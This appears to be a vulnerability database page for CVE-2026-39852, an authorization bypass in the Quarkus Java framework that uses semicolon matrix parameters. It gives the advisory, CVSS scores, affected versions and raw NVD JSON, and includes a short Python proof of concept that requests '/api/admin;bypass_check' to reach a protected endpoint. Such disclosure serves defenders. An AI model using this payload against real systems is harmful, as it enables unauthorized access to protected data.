CVE-2026-39852

Description

Quarkus is a Java framework for building cloud-native applications. In versions prior to 3.20.6.1, 3.27.3.1, 3.33.1.1, 3.35.1.1, 3.34.7, and 3.35.2, a path normalization inconsistency between the security layer and the routing layer allows unauthenticated or lower-privileged users to bypass HTTP path-based authorization policies. Quarkus's security layer performs authorization checks on the raw URL path which preserves matrix parameters (semicolons), while RESTEasy Reactive's routing layer strips matrix parameters before matching endpoints. An attacker can append a semicolon and arbitrary text to a request URL (e.g., /api/admin;anything) to bypass policies protecting /api/admin while still routing to the protected endpoint. This issue has been fixed in versions 3.20.6.1, 3.27.3.1, 3.33.1.1, 3.35.1.1, 3.34.7, and 3.35.2.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:* - VULNERABLE

Quarkus < 3.20.6.1

Quarkus < 3.27.3.1

Quarkus < 3.33.1.1

Quarkus < 3.35.1.1

Quarkus < 3.34.7

Quarkus < 3.35.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_poc(target_url):
    # Path to protected endpoint
    protected_path = "/api/admin"
    # Bypass payload: append semicolon and arbitrary text
    bypass_payload = ";bypass_check"
    
    full_url = f"{target_url}{protected_path}{bypass_payload}"
    
    print(f"[*] Attempting to access: {full_url}")
    
    try:
        response = requests.get(full_url)
        if response.status_code == 200:
            print("[+] Authorization bypass successful! Access granted.")
            print(f"[+] Response Content: {response.text[:100]}")
        else:
            print(f"[-] Access denied or error. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "http://vulnerable-host:8080"
    exploit_poc(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39852
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39852
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39852/
[4] VulDB https://vuldb.com/cve/CVE-2026-39852
[5] https://github.com/quarkusio/quarkus/security/advisories/GHSA-rc95-pcm8-65v9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39852", "sourceIdentifier": "[email protected]", "published": "2026-05-05T21:16:22.823", "lastModified": "2026-05-08T17:18:38.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quarkus is a Java framework for building cloud-native applications. In versions prior to 3.20.6.1, 3.27.3.1, 3.33.1.1, 3.35.1.1, 3.34.7, and 3.35.2, a path normalization inconsistency between the security layer and the routing layer allows unauthenticated or lower-privileged users to bypass HTTP path-based authorization policies. Quarkus's security layer performs authorization checks on the raw URL path which preserves matrix parameters (semicolons), while RESTEasy Reactive's routing layer strips matrix parameters before matching endpoints. An attacker can append a semicolon and arbitrary text to a request URL (e.g., /api/admin;anything) to bypass policies protecting /api/admin while still routing to the protected endpoint. This issue has been fixed in versions 3.20.6.1, 3.27.3.1, 3.33.1.1, 3.35.1.1, 3.34.7, and 3.35.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.20.6.1", "matchCriteriaId": "E5AE56EF-94DF-4552-B4E4-B72B532DE04C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.21.0", "versionEndExcluding": "3.27.3.1", "matchCriteriaId": "DE8ACEA5-1401-493F-A1E5-0D9D87174161"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.28.0", "versionEndExcluding": "3.33.1.1", "matchCriteriaId": "E37E4AF5-6CDF-47E7-998C-C8744296A503"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.34.0", "versionEndExcluding": "3.34.7", "matchCriteriaId": "6179CFEC-6CBF-45D7-9DE5-F47CB1D36F99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkus:quarkus:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.35.0", "versionEndExcluding": "3.35.2", "matchCriteriaId": "4397C81B-D8AF-4DD5-86B4-70CE00462BD3"}]}]}], "references": [{"url": "https://github.com/quarkusio/quarkus/security/advisories/GHSA-rc95-pcm8-65v9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}